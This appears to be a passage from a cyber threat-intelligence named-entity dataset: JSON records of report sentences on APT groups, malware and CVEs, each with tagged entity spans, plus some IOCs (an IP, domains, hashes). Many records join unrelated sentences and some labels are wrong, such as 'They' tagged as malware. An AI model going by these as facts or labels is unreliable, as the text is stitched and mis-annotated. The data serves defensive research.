Leafminer has developed exploit payloads for this framework ( Table 2 ) that deliver custom malware through attacks against SMB vulnerabilities described by Microsoft .", "spans": {"TOOL: Nidiran": [[228, 235]], "TOOL: self-extracting executable": [[259, 285]], "MALWARE: .tmp": [[320, 324]], "THREAT_ACTOR: Leafminer": [[361, 370]], "VULNERABILITY: exploit": [[385, 392]], "TOOL: SMB": [[485, 488]], "VULNERABILITY: vulnerabilities": [[489, 504]], "ORGANIZATION: Microsoft": [[518, 527]]}, "info": {"id": "cyberner_stix_train_006598", "source": "cyberner_stix_train"}} {"text": "Artifact #2 operates as a backchannel for the attacker to maintain a foothold inside the compromised network .", "spans": {}, "info": {"id": "cyberner_stix_train_006599", "source": "cyberner_stix_train"}} {"text": "The ‘ onload5 ’ function is responsible for adding the newly loaded SWF object as a child object .", "spans": {"TOOL: SWF": [[68, 71]]}, "info": {"id": "cyberner_stix_train_006600", "source": "cyberner_stix_train"}} {"text": "With each networked IoT device having its own separate network stack , it ’s quite easy to see the need for better enterprise management , especially in today ’s “ bring your own device ” world .", "spans": {"TOOL: IoT": [[20, 23]]}, "info": {"id": "cyberner_stix_train_006601", "source": "cyberner_stix_train"}} {"text": "July 13 Further analysis of the hacking team dump revealed that the company used UEFI BIOS rootkit to keep their Remote Control System ( RCS ) agent installed in their targets ’ systems . If successful , Cobalt goes on to attack financial institutions outside the country . . 
A typical log entry showing access to the PowerShell backend is detailed in the Remote PowerShell HTTP logs , located in , such as in the example below : CrowdStrike incident responders discovered Remote PowerShell logs similar to log entries for ProxyNotShell exploitation to gain initial access , suggesting the attacker leveraged Remote PowerShell .", "spans": {"MALWARE: UEFI BIOS rootkit": [[81, 98]], "MALWARE: Remote Control System ( RCS )": [[113, 142]], "THREAT_ACTOR: Cobalt": [[204, 210]], "ORGANIZATION: financial institutions": [[229, 251]], "ORGANIZATION: CrowdStrike incident responders": [[430, 461]], "THREAT_ACTOR: attacker": [[590, 598]], "TOOL: Remote PowerShell": [[609, 626]]}, "info": {"id": "cyberner_stix_train_006602", "source": "cyberner_stix_train"}} {"text": "Coronavirus Update App Leads to Project Spy Android and iOS Spyware We discovered a cyberespionage campaign we have named Project Spy infecting Android and iOS devices with spyware by using the coronavirus disease ( Covid-19 ) as a lure . Without Symantec 's advanced AI-based capabilities , Gallmaker 's activities may well have remained undetected . 
for example , Cisco Talos recently worked with two vendors to patch multiple vulnerabilities in a favored software library used in chemistry laboratories and the Foxit PDF Reader , one of the most popular PDF reader alternatives to Adobe Acrobat .", "spans": {"SYSTEM: Coronavirus Update App": [[0, 22]], "MALWARE: Project Spy": [[32, 43], [122, 133]], "SYSTEM: Android": [[44, 51], [144, 151]], "SYSTEM: iOS": [[56, 59], [156, 159]], "ORGANIZATION: Symantec": [[247, 255]], "THREAT_ACTOR: Gallmaker": [[292, 301]], "ORGANIZATION: Cisco Talos": [[366, 377]], "TOOL: Foxit PDF Reader": [[514, 530]], "TOOL: Adobe Acrobat": [[584, 597]]}, "info": {"id": "cyberner_stix_train_006603", "source": "cyberner_stix_train"}} {"text": "On the other hand , ShadowBrokers group made headlines in 2016 when it claimed to have robbed various exploitation tools used by the NSA including the notorious ETERNALBLUE that was a vital component in the WannaCry ransomware campaign causing damages to systems worldwide . It's coincident that both 'darkhydrus' APT group name and ‘Williams’ user name in PDB path found in this Twitter user .", "spans": {"ORGANIZATION: NSA": [[133, 136]], "VULNERABILITY: ETERNALBLUE": [[161, 172]], "THREAT_ACTOR: 'darkhydrus'": [[301, 313]], "THREAT_ACTOR: ‘Williams’": [[333, 343]], "ORGANIZATION: Twitter user": [[380, 392]]}, "info": {"id": "cyberner_stix_train_006604", "source": "cyberner_stix_train"}} {"text": "As shown within the timeline above , the WINDSHIFT activity observed by Unit 42 falls between January and May of 2018 . 
Silence conducted a massive phishing campaign posing as the Central Bank of the Russian Federation .", "spans": {"ORGANIZATION: Unit 42": [[72, 79]], "THREAT_ACTOR: Silence": [[120, 127]], "ORGANIZATION: Central Bank": [[180, 192]]}, "info": {"id": "cyberner_stix_train_006605", "source": "cyberner_stix_train"}} {"text": "It does so by calling a sub-function to decrypt the content , using the value stored in the ‘ r1 ’ variable as a key .", "spans": {}, "info": {"id": "cyberner_stix_train_006606", "source": "cyberner_stix_train"}} {"text": "Typically , APT10 tends to employ a namesquatting scheme in their domains that aims to confuse the observer by posing as a legitimate domain . This sample was also found to be deployed using the CVE-2012-0158 vulnerability .", "spans": {"THREAT_ACTOR: APT10": [[12, 17]], "VULNERABILITY: CVE-2012-0158": [[195, 208]]}, "info": {"id": "cyberner_stix_train_006607", "source": "cyberner_stix_train"}} {"text": "] 6 , was previously hosting the domain next.nextuptravel [ . They download and install an archive containing executables and trivially modified source code of the password-stealing tool Mimikatz Lite as GetPassword.exe . Poison Ivy includes features common to most Windows-based RATs , including key logging , screen capturing , video capturing , file transfers , system administration , password theft , and traffic relaying .", "spans": {"MALWARE: Mimikatz Lite": [[187, 200]], "MALWARE: GetPassword.exe": [[204, 219]], "MALWARE: Poison Ivy": [[222, 232]], "SYSTEM: Windows-based": [[266, 279]], "MALWARE: RATs": [[280, 284]]}, "info": {"id": "cyberner_stix_train_006608", "source": "cyberner_stix_train"}} {"text": "The worm leverages an SMBv1 exploit that originates from tools released by the Shadow Brokers threat group in April . 
The Turla group is known to be painstaking and work in stages , first doing reconnaissance on their victims' systems before deploying their most sophisticated tools such as Carbon .", "spans": {"VULNERABILITY: SMBv1 exploit": [[22, 35]], "THREAT_ACTOR: Shadow Brokers": [[79, 93]], "THREAT_ACTOR: threat group": [[94, 106]], "THREAT_ACTOR: Turla": [[122, 127]], "MALWARE: Carbon": [[291, 297]]}, "info": {"id": "cyberner_stix_train_006609", "source": "cyberner_stix_train"}} {"text": "The malware samples were mainly distributed through a series of malicious subdomains registered under a legitimate domain belonging to a well-known shared hosting service provider in Russia . PROMETHIUM and NEODYMIUM both used a zero-day exploit that executed code to download a malicious payload . Ssdeep : 768:u0foGtYZKQ5QZJQ6hKVsEEIHNDxpy3TI3dU4DKfLX9Eir : uG1aKQ5OwCrItq3TgGfLt9r . It now appears those attacks were perpetrated by Harrison , who sent emails from different accounts at the free email service Vistomail pretending to be Bradshaw , his then - girlfriend and their friends .", "spans": {"THREAT_ACTOR: PROMETHIUM": [[192, 202]], "THREAT_ACTOR: NEODYMIUM": [[207, 216]], "VULNERABILITY: zero-day exploit": [[229, 245]], "TOOL: Ssdeep": [[299, 305]], "THREAT_ACTOR: Harrison": [[435, 443]]}, "info": {"id": "cyberner_stix_train_006610", "source": "cyberner_stix_train"}} {"text": "Researchers at Kaspersky Lab privately disclosed the flaw to Adobe after exploits against the zero-day were used in March by the ScarCruft APT gang in what Kaspersky Lab is calling Operation Daybreak . 
The FBI said the \" group of malicious cyber actors \" ( known as APT6 or 1.php ) used dedicated top-level domains in conjunction with the command and control servers to deliver \" customized malicious software \" to government computer systems .", "spans": {"ORGANIZATION: Kaspersky Lab": [[15, 28], [156, 169]], "VULNERABILITY: zero-day": [[94, 102]], "ORGANIZATION: FBI": [[206, 209]], "THREAT_ACTOR: APT6": [[266, 270]], "FILEPATH: 1.php": [[274, 279]], "MALWARE: customized malicious software": [[380, 409]]}, "info": {"id": "cyberner_stix_train_006611", "source": "cyberner_stix_train"}} {"text": "The goal of the attackers appears to be to collect intellectual property such as design documents , formulas , and manufacturing processes . After reestablishing access , the adversaries download tools such as gsecudmp and WCE that are staged temporarily on websites that TG-3390 previously compromised but never used .", "spans": {"MALWARE: gsecudmp": [[210, 218]], "MALWARE: WCE": [[223, 226]], "THREAT_ACTOR: TG-3390": [[272, 279]]}, "info": {"id": "cyberner_stix_train_006612", "source": "cyberner_stix_train"}} {"text": "This change came hand in hand with a new overlay target list , no longer targeting social apps , but focusing on banking instead . we assess with high confidence that these incidents were conducted by APT10 also known as Stone Panda , menuPass , CVNX in an effort to gain access to networks and steal valuable intellectual property or gain commercial advantage . 
We have observed that the adversary has repeatedly attacked a high-profile target in Japan using multiple malware families for the last three years .", "spans": {"THREAT_ACTOR: APT10": [[201, 206]], "THREAT_ACTOR: Stone Panda": [[221, 232]], "THREAT_ACTOR: menuPass": [[235, 243]], "THREAT_ACTOR: CVNX": [[246, 250]], "MALWARE: malware families": [[469, 485]]}, "info": {"id": "cyberner_stix_train_006613", "source": "cyberner_stix_train"}} {"text": "This is done using a series of syscalls as outlined below . The attackers try to lure targets through spear phishing emails that include compressed executables . They simply use the website for legitimate purposes , such as posting forum threads or creating profile pages . If the target system meets the pre - defined requirements , the malware will use Twitter ( unbeknownst to the user ) and start looking for specific tweets from pre - made accounts .", "spans": {}, "info": {"id": "cyberner_stix_train_006614", "source": "cyberner_stix_train"}} {"text": "This spyware sample communicates over dynamic DNS . this RTF exploits again the CVE-2017_1882 on eqnedt32.exe . Night Dragon is a campaign name for activity involving a threat group that has conducted activity originating primarily in China .", "spans": {"MALWARE: RTF": [[57, 60]], "VULNERABILITY: CVE-2017_1882": [[80, 93]], "MALWARE: eqnedt32.exe": [[97, 109]], "THREAT_ACTOR: Night Dragon": [[112, 124]]}, "info": {"id": "cyberner_stix_train_006615", "source": "cyberner_stix_train"}} {"text": "Of the 195 functions of the new sample , 149 are strictly identical , 16 match at 90% and 2 match at 80% .", "spans": {}, "info": {"id": "cyberner_stix_train_006616", "source": "cyberner_stix_train"}} {"text": "The server sends back encoded json containing URL , class name and method name . Figure 3: Embedded URL in OLE object CVE-2017-11882 Similarly , we have also observed actors leveraging another recently discovered vulnerability (CVE-2017-11882) in Microsoft Office . 
The archive contains an .exe file , sometimes disguised as a Microsoft Word file , a video , or another file format , using the corresponding icon .", "spans": {"VULNERABILITY: CVE-2017-11882": [[118, 132]], "THREAT_ACTOR: actors": [[167, 173]], "VULNERABILITY: (CVE-2017-11882)": [[227, 243]], "FILEPATH: .exe file": [[290, 299]], "FILEPATH: Microsoft Word file": [[327, 346]]}, "info": {"id": "cyberner_stix_train_006617", "source": "cyberner_stix_train"}} {"text": "CTU researchers have observed the threat actors installing a credential logger and backdoor on Microsoft Exchange servers , which requires a technical grasp of Internet Information Services ( IIS ) .", "spans": {"ORGANIZATION: CTU": [[0, 3]], "ORGANIZATION: Microsoft": [[95, 104]], "TOOL: Exchange": [[105, 113]], "TOOL: Internet Information Services": [[160, 189]], "TOOL: IIS": [[192, 195]]}, "info": {"id": "cyberner_stix_train_006618", "source": "cyberner_stix_train"}} {"text": "Playing further off the suggested GAS Tecnologia link , the app promises better security for its users . TA505 is also using FlowerPippi (Backdoor.Win32.FLOWERPIPPI.A) , a new backdoor that we found them using in their campaigns against targets in Japan , India , and Argentina . 
Regardless of their sophistication or refinement , the malware families within the Lazarus Group 's India and Lima classes perform at a reasonable level for their designed purpose : the introduction and persistence of malware from the Lazarus Group on a victim 's infrastructure .", "spans": {"SYSTEM: GAS Tecnologia": [[34, 48]], "THREAT_ACTOR: TA505": [[105, 110]], "TOOL: FlowerPippi": [[125, 136]], "TOOL: backdoor": [[176, 184]], "THREAT_ACTOR: Lazarus Group": [[363, 376], [515, 528]]}, "info": {"id": "cyberner_stix_train_006619", "source": "cyberner_stix_train"}} {"text": "Encounter In early 2019 , the Check Point Research team observed a surge of Android malware attack attempts against users in India which had strong characteristics of Janus vulnerability abuse ; All samples our team collected during preliminary investigation had the ability to hide their app icons and claim to be Google related updaters or vending modules ( a key component of Google Play framework ) . Threat actors have delivered Bookworm as a payload in attacks on targets in Thailand . All 13 countries where Kaspersky reportedly observed BlackOasis activity are connected to Saudi Arabia in one of three ways : economically ; from a national security perspective ; or due to established policy agreements . 
WIRTE has used HTTPS over ports 2083 and 2087 for C2.ZxShell can use ports 1985 and 1986 in HTTP / S communication.[47 ] Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level .", "spans": {"ORGANIZATION: Check Point": [[30, 41]], "SYSTEM: Android": [[76, 83]], "VULNERABILITY: Janus": [[167, 172]], "ORGANIZATION: Google": [[315, 321]], "SYSTEM: Google Play": [[379, 390]], "TOOL: Bookworm": [[434, 442]], "ORGANIZATION: Kaspersky": [[515, 524]], "THREAT_ACTOR: BlackOasis": [[545, 555]], "MALWARE: WIRTE": [[714, 719]], "SYSTEM: HTTPS": [[729, 734]], "MALWARE: C2.ZxShell": [[764, 774]]}, "info": {"id": "cyberner_stix_train_006620", "source": "cyberner_stix_train"}} {"text": "Such a framework typically consists of five elements :", "spans": {}, "info": {"id": "cyberner_stix_train_006621", "source": "cyberner_stix_train"}} {"text": "Ultimately , APT35 had used access to hundreds of mailboxes to read email communications and steal data related to Middle East organizations , which later became victims of destructive attacks . 
Data from the early part of this year shows that the Taidoor attackers rampantly used malicious.DOC files to exploit a Microsoft Common Controls vulnerability , CVE-2012-0158 .", "spans": {"THREAT_ACTOR: APT35": [[13, 18]], "ORGANIZATION: email communications": [[68, 88]], "FILEPATH: malicious.DOC": [[281, 294]], "VULNERABILITY: exploit": [[304, 311]], "ORGANIZATION: Microsoft": [[314, 323]], "TOOL: Common Controls": [[324, 339]], "VULNERABILITY: vulnerability": [[340, 353]], "VULNERABILITY: CVE-2012-0158": [[356, 369]]}, "info": {"id": "cyberner_stix_train_006622", "source": "cyberner_stix_train"}} {"text": "Attackers send a spear phishing email to employees at the target organization .", "spans": {"TOOL: email": [[32, 37]]}, "info": {"id": "cyberner_stix_train_006623", "source": "cyberner_stix_train"}} {"text": "Shamoon2 : 5.254.100.200 Shamoon2 : URLs .", "spans": {"MALWARE: Shamoon2": [[0, 8], [25, 33]], "IP_ADDRESS: 5.254.100.200": [[11, 24]], "TOOL: URLs": [[36, 40]]}, "info": {"id": "cyberner_stix_train_006624", "source": "cyberner_stix_train"}} {"text": "All modules set hidden attributes to their files : Module Paths Exfiltrated data format msconf.exe % APPDATA % /myupd/gen/ % Y % m % d- % H % M % S_filesystem.zip ( file structure dump ) system.exe % APPDATA % /myupd/aud/ % d % m % Y % H % M % S.wav ( surrounding sounds ) update.exe % APPDATA % /myupd_tmp/txt/ % APPDATA % /myupd/txt/ % Y % m In theory , Shun Wang Technologies could have collected a third of China’s population names and contact numbers if not more . FIN6 : ITG08 .", "spans": {"THREAT_ACTOR: Shun Wang": [[356, 365]], "THREAT_ACTOR: FIN6": [[470, 474]], "THREAT_ACTOR: ITG08": [[477, 482]]}, "info": {"id": "cyberner_stix_train_006625", "source": "cyberner_stix_train"}} {"text": "They also download apks secretly and record audios and videos , then upload users’ privacy information to server , causing users’ privacy leakage . 
Taking a step back , as discussed in the Appendix in our initial OilRig blog , Clayslide delivery documents initially open with a worksheet named \" Incompatible \" that displays content that instructs the user to \" Enable Content \" to see the contents of the document , which in fact runs the malicious macro and compromises the system .", "spans": {"MALWARE: They": [[0, 4]], "THREAT_ACTOR: OilRig": [[213, 219]], "FILEPATH: Clayslide delivery documents": [[227, 255]]}, "info": {"id": "cyberner_stix_train_006626", "source": "cyberner_stix_train"}} {"text": "drivres-update.info softupdates.info The module uses a hardcoded URL ( “ /check/ “ ) for sending HTTP POST requests to its C2 servers .", "spans": {"DOMAIN: drivres-update.info": [[0, 19]], "DOMAIN: softupdates.info": [[20, 36]], "TOOL: C2": [[123, 125]]}, "info": {"id": "cyberner_stix_train_006627", "source": "cyberner_stix_train"}} {"text": "The documents attached to spear-phishing e-mails used in both attacks contain code that exploits CVE-2012-0158 , which despite its age remains one of the most common Microsoft Word vulnerabilities being exploited by multiple threat actors . Black Lambert was seen only briefly and we assume it was \" retired \" from the arsenal after being discovered by FireEye in 2014 .", "spans": {"MALWARE: documents": [[4, 13]], "VULNERABILITY: CVE-2012-0158": [[97, 110]], "VULNERABILITY: Microsoft Word vulnerabilities": [[166, 196]], "MALWARE: Black Lambert": [[241, 254]], "ORGANIZATION: FireEye": [[353, 360]]}, "info": {"id": "cyberner_stix_train_006628", "source": "cyberner_stix_train"}} {"text": "UNBLOCK – unblock the telephone ( revoke device administrator privileges from the app ) . The attackers sent multiple emails containing macro-enabled XLS files to employees working in the banking sector in the Middle East . 
The researchers found that there are common elements in the macro and in the first- stage RAT used in this campaign , with former campaigns of the NICKEL ACADEMY ( Lazarus ) threat group .", "spans": {"THREAT_ACTOR: attackers": [[94, 103]], "MALWARE: XLS files": [[150, 159]], "ORGANIZATION: employees working in the banking sector": [[163, 202]], "MALWARE: RAT": [[314, 317]], "THREAT_ACTOR: NICKEL ACADEMY": [[371, 385]], "THREAT_ACTOR: Lazarus": [[388, 395]]}, "info": {"id": "cyberner_stix_train_006629", "source": "cyberner_stix_train"}} {"text": "The attacks we attribute to Scarlet Mimic have primarily targeted Uyghur and Tibetan activists as well as those who are interested in their causes . APT33 sent spear phishing emails to employees whose jobs related to the aviation industry .", "spans": {"THREAT_ACTOR: Scarlet Mimic": [[28, 41]], "ORGANIZATION: Uyghur": [[66, 72]], "ORGANIZATION: Tibetan activists": [[77, 94]], "THREAT_ACTOR: APT33": [[149, 154]], "TOOL: emails": [[175, 181]], "ORGANIZATION: employees": [[185, 194]], "ORGANIZATION: aviation industry": [[221, 238]]}, "info": {"id": "cyberner_stix_train_006630", "source": "cyberner_stix_train"}} {"text": "Th 64KB buffer is used as a VM descriptor data structure to store data and the just-in-time ( JIT ) generated code to run . Based on the targeting and lures , Unit 42 assesses that the Lotus Blossom actors ' collection requirements include militaries and government agencies in Southeast Asia . Early in the payload , the malware checks to see if the system language is Russian or Chinese . e.g. 
, uses character as a separator and that contains valid IP list uses as a separator .", "spans": {"ORGANIZATION: Unit 42": [[159, 166]], "THREAT_ACTOR: Lotus Blossom actors": [[185, 205]], "ORGANIZATION: militaries": [[240, 250]], "ORGANIZATION: government agencies": [[255, 274]]}, "info": {"id": "cyberner_stix_train_006631", "source": "cyberner_stix_train"}} {"text": "We believe this HTTP GET request was the actor visiting the webshell after exploitation and prior to executing commands .", "spans": {}, "info": {"id": "cyberner_stix_train_006632", "source": "cyberner_stix_train"}} {"text": "The following is a summary of observed WINDSHIFT activity which targeted a Middle Eastern government agency . We are however only aware of one instance - the exploitation of CVE-2013-0640 to deploy MiniDuke - where we believe the exploited vulnerability was a zero-day at the time that the group acquired the exploit .", "spans": {"ORGANIZATION: government agency": [[90, 107]], "VULNERABILITY: CVE-2013-0640": [[174, 187]], "MALWARE: MiniDuke": [[198, 206]], "VULNERABILITY: zero-day": [[260, 268]], "VULNERABILITY: exploit": [[309, 316]]}, "info": {"id": "cyberner_stix_train_006633", "source": "cyberner_stix_train"}} {"text": "XLoader Disguises as Android Apps , Has FakeSpy Links This new XLoader variant poses as a security app for Android devices , and uses a malicious iOS profile to affect iPhone and iPad devices . In March 2014 , the group leveraged the disappearance of Malaysia Airlines Flight MH370 to target a government in the Asia-Pacific region and a US-based think tank . Name Delivery Server . 
COSMICENERGY is the latest example of specialized OT malware capable of causing cyber physical impacts , which are rarely discovered or disclosed .", "spans": {"MALWARE: XLoader": [[0, 7], [63, 70]], "SYSTEM: Android": [[21, 28], [107, 114]], "MALWARE: FakeSpy": [[40, 47]], "SYSTEM: iOS": [[146, 149]], "SYSTEM: iPhone": [[168, 174]], "SYSTEM: iPad": [[179, 183]], "THREAT_ACTOR: group": [[214, 219]], "ORGANIZATION: government": [[294, 304]], "ORGANIZATION: think tank": [[347, 357]], "MALWARE: COSMICENERGY": [[383, 395]], "MALWARE: specialized OT malware": [[421, 443]]}, "info": {"id": "cyberner_stix_train_006634", "source": "cyberner_stix_train"}} {"text": "We’ve discovered a new version of BalkanDoor with a new method for execution/installation: an exploit of the WinRAR ACE vulnerability CVE-2018-20250 . Bahamut targeted similar Qatar-based individuals during their campaign .", "spans": {"THREAT_ACTOR: BalkanDoor": [[34, 44]], "VULNERABILITY: CVE-2018-20250": [[134, 148]], "THREAT_ACTOR: Bahamut": [[151, 158]]}, "info": {"id": "cyberner_stix_train_006635", "source": "cyberner_stix_train"}} {"text": "Oftentimes , the emailed link is a bit.ly shortened link , used to potentially evade detection . The attackers originally embedded an implant into the malicious document as a hypertext application (HTA) file , and then quickly moved to hide it in an image on a remote server and used obfuscated Visual Basic macros to launch the decoder script . Equation is a sophisticated threat group that employs multiple remote access tools .", "spans": {"THREAT_ACTOR: attackers": [[101, 110]], "THREAT_ACTOR: Equation": [[346, 354]], "MALWARE: remote access tools": [[409, 428]]}, "info": {"id": "cyberner_stix_train_006636", "source": "cyberner_stix_train"}} {"text": "It leverages webinjects and SMS reading capabilities to bypass two-factor authentication , and is clearly targeting financial applications . 
In their latest leak , they have released the UNITEDRAKE NSA exploit , which is a remote access and control tool that can remotely target Windows-based systems to capture desired information and transfer it to a server . As a result of our analysis of APT10 's activities , we believe that it almost certainly benefits from significant staffing and logistical resources , which have increased over the last three years , with a significant step-change in 2016 .", "spans": {"VULNERABILITY: UNITEDRAKE NSA exploit": [[187, 209]], "THREAT_ACTOR: APT10": [[393, 398]]}, "info": {"id": "cyberner_stix_train_006637", "source": "cyberner_stix_train"}} {"text": "In this version of Rotexy , dynamic generation of lowest-level domains was not used . The Leviathan also occasionally used macro-laden Microsoft Word documents to target other US research and development organizations during this period . FBI has high confidence that HIDDEN COBRA actors are using malware variants in conjunction with proxy servers to maintain a presence on victim networks and to further network exploitation .", "spans": {"MALWARE: Rotexy": [[19, 25]], "THREAT_ACTOR: Leviathan": [[90, 99]], "MALWARE: macro-laden Microsoft Word documents": [[123, 159]], "ORGANIZATION: development organizations": [[192, 217]], "ORGANIZATION: FBI": [[239, 242]], "THREAT_ACTOR: HIDDEN COBRA actors": [[268, 287]]}, "info": {"id": "cyberner_stix_train_006638", "source": "cyberner_stix_train"}} {"text": "Reports indicate fake versions of the Amaq app exist , likely in order to spy on those that use it . APT41 is unique among tracked China-based actors in that it leverages non-public malware typically reserved for espionage operations in what appears to be activity that falls outside the scope of state-sponsored missions . 
APT19 seemed to be going after defense sector firms , Chinese dissident groups and other political target , as well as certain financial targets and other commercial targets in pharmaceutical and energy sectors that could benefit the Chinese economy .", "spans": {"SYSTEM: Amaq": [[38, 42]], "THREAT_ACTOR: APT41": [[101, 106]], "THREAT_ACTOR: APT19": [[324, 329]], "ORGANIZATION: defense sector firms": [[355, 375]], "ORGANIZATION: political": [[413, 422]], "ORGANIZATION: financial": [[451, 460]], "ORGANIZATION: commercial": [[479, 489]], "ORGANIZATION: pharmaceutical": [[501, 515]], "ORGANIZATION: energy sectors": [[520, 534]]}, "info": {"id": "cyberner_stix_train_006639", "source": "cyberner_stix_train"}} {"text": "This entry was posted on Thu Dec 14 10:00 EST 2017 and filed under Malware , Nathan Brubaker , Christopher Glyer , Blake Johnson , Dan Caban , Marina Krotofil , ICS Security , and Dan Scali . The Leviathan also occasionally used macro-laden Microsoft Word documents to target other US research and development organizations during this period .", "spans": {"ORGANIZATION: ICS Security": [[161, 173]], "THREAT_ACTOR: Leviathan": [[196, 205]], "FILEPATH: macro-laden Microsoft Word documents": [[229, 265]], "ORGANIZATION: development organizations": [[298, 323]]}, "info": {"id": "cyberner_stix_train_006640", "source": "cyberner_stix_train"}} {"text": "This allows the PHA authors to monetize their apps more effectively than through regular advertising . Obviously , the developers behind NetTraveler have taken steps to try to hide the malware 's configuration . Since 1949 , Beijing has claimed Taiwan as a part of China and strongly opposes any action toward independence . The U.S. 
Cybersecurity and Infrastructure Security Agency ( CISA ) released a detailed timeline on the campaign , stating that an investigation from Microsoft revealed that “ advanced persistent threat ( APT ) actors accessed and exfiltrated unclassified Exchange Online Outlook data ” after users reported suspicious activities in their Microsoft 365 cloud environment .", "spans": {"TOOL: NetTraveler": [[137, 148]], "ORGANIZATION: U.S. Cybersecurity and Infrastructure Security Agency ( CISA )": [[329, 391]], "ORGANIZATION: Microsoft": [[474, 483]], "THREAT_ACTOR: advanced persistent threat ( APT ) actors": [[500, 541]], "SYSTEM: Microsoft 365 cloud environment": [[663, 694]]}, "info": {"id": "cyberner_stix_train_006641", "source": "cyberner_stix_train"}} {"text": "The group demonstrates malleability and innovation in maintaining and producing familiar SPLM functionality , but the pragmatic and systematic approach towards producing undetected or difficult-to-detect malware continues .", "spans": {"MALWARE: SPLM": [[89, 93]]}, "info": {"id": "cyberner_stix_train_006642", "source": "cyberner_stix_train"}} {"text": "Based on these and other similar stylistic differences observed between CozyDuke and its older siblings , we speculate that while the older Duke families appear to be the work of someone with a background in malware writing ( or at the least in hacking ) , CozyDuke ’s author or authors more likely came from a software development background .", "spans": {"MALWARE: CozyDuke": [[72, 80], [257, 265]], "THREAT_ACTOR: Duke": [[140, 144]]}, "info": {"id": "cyberner_stix_train_006643", "source": "cyberner_stix_train"}} {"text": "But , behind the scenes , the malware has not been removed ; instead it starts preparing its onslaught of attacks . In total , Silence sent out about 80 , 000 emails , with more than half of them targeting Taiwan , Malaysia , and South Korea . 
The Charming Kitten' focus appears to be individuals of interest to Iran in the fields of academic research .", "spans": {"THREAT_ACTOR: Silence": [[127, 134]], "THREAT_ACTOR: Charming Kitten'": [[248, 264]], "ORGANIZATION: academic research": [[334, 351]]}, "info": {"id": "cyberner_stix_train_006644", "source": "cyberner_stix_train"}} {"text": "The threat actors used social engineering to convince users to run an embedded macro in a Microsoft Word document that launched a malicious PowerShell payload .", "spans": {"THREAT_ACTOR: The threat actors": [[0, 17]], "TOOL: social engineering": [[23, 41]], "MALWARE: macro": [[79, 84]], "TOOL: Microsoft Word document": [[90, 113]], "MALWARE: malicious PowerShell payload": [[130, 158]]}, "info": {"id": "cyberner_stix_train_006645", "source": "cyberner_stix_train"}} {"text": "We initially reported on this threat group and their UPDATESEE malware in our FireEye Intelligence Center in February 2016 . Sometimes the attackers send an MS PowerPoint document instead , which exploits CVE-2014-6352 .", "spans": {"TOOL: UPDATESEE malware": [[53, 70]], "ORGANIZATION: FireEye Intelligence": [[78, 98]], "THREAT_ACTOR: attackers": [[139, 148]], "FILEPATH: MS PowerPoint document": [[157, 179]], "VULNERABILITY: CVE-2014-6352": [[205, 218]]}, "info": {"id": "cyberner_stix_train_006646", "source": "cyberner_stix_train"}} {"text": "However , in September last year , our friends at CSIS published a blog detailing a new Carbanak variant affecting one of its customers . 
Notably , APT41 was observed using proof-of-concept exploit code for CVE-2019-3396 within 23 days after the Confluence .", "spans": {"ORGANIZATION: CSIS": [[50, 54]], "VULNERABILITY: Carbanak": [[88, 96]], "THREAT_ACTOR: APT41": [[148, 153]], "VULNERABILITY: exploit": [[190, 197]], "VULNERABILITY: CVE-2019-3396": [[207, 220]]}, "info": {"id": "cyberner_stix_train_006647", "source": "cyberner_stix_train"}} {"text": "We believe that the Carbanak campaign is a clear indicator of a new era in cybercrime in which criminals use APT techniques directly against the financial industry instead of through its customers . The attack leveraged malware we called ' BlackLambert ' , which was used to target a high profile organization in Europe .", "spans": {"VULNERABILITY: Carbanak": [[20, 28]], "THREAT_ACTOR: criminals": [[95, 104]], "ORGANIZATION: financial industry": [[145, 163]], "ORGANIZATION: customers": [[187, 196]], "MALWARE: BlackLambert": [[240, 252]], "ORGANIZATION: high profile organization": [[284, 309]]}, "info": {"id": "cyberner_stix_train_006648", "source": "cyberner_stix_train"}} {"text": "Moreover , the backdoor contains a list of filenames related to credentials from software listed below ( database names ) :", "spans": {}, "info": {"id": "cyberner_stix_train_006649", "source": "cyberner_stix_train"}} {"text": "An interesting feature of this family of banking Trojans is the simultaneous use of three command sources : Google Cloud Messaging ( GCM ) service – used to send small messages in JSON format to a mobile device via Google servers ; malicious C & C server ; incoming SMS messages . In 2014 , APT32 leveraged a spear-phishing attachment titled \" Plans to crackdown on protesters at the Embassy of Vietnam.exe \" . 
Lazarus actors commonly maintain persistence on a victim 's system by installing the malware-as-a-service .", "spans": {"THREAT_ACTOR: APT32": [[291, 296]], "MALWARE: Vietnam.exe": [[395, 406]], "THREAT_ACTOR: Lazarus actors": [[411, 425]]}, "info": {"id": "cyberner_stix_train_006650", "source": "cyberner_stix_train"}} {"text": "Again , much of the modification work focused on removing redundant code in an attempt to appear different from earlier versions of the loader .", "spans": {}, "info": {"id": "cyberner_stix_train_006651", "source": "cyberner_stix_train"}} {"text": "WRITE_EXTERNAL_STORAGE - Allows the application to write to external storage . Several spear-phishing campaigns attributed to Carbanak , all occurring between March and May 2018 , were analyzed by security researchers in 2018 . The crew combines both regular crime and targeted attack objectives using the same domain infrastructure over time , rarely changing their TTPs .", "spans": {"THREAT_ACTOR: Carbanak": [[126, 134]], "MALWARE: domain infrastructure": [[311, 332]]}, "info": {"id": "cyberner_stix_train_006652", "source": "cyberner_stix_train"}} {"text": "While the stolen certificates were different , and stolen in separate instances , they were both used with custom malware in targeted attacks originating from China .", "spans": {}, "info": {"id": "cyberner_stix_train_006653", "source": "cyberner_stix_train"}} {"text": "IOCS Hashes 139edb1bc033725539b117f50786f3d3362ed45845c57fe1f82e7ed72b044367 e19823a1ba4a0e40cf459f4a0489fc257720cc0d71ecfb7ad94b3ca86fbd85d1 e19823a1ba4a0e40cf459f4a0489fc257720cc0d71ecfb7ad94b3ca86fbd85d1 e5f346d8f312cc1f93c2c6af611e2f50805c528934786ea173cabc6a39b14cda This document , written in Vietnamese , appears to be reviewing and discussing best practices for teaching and researching scientific topics . APT12 . 
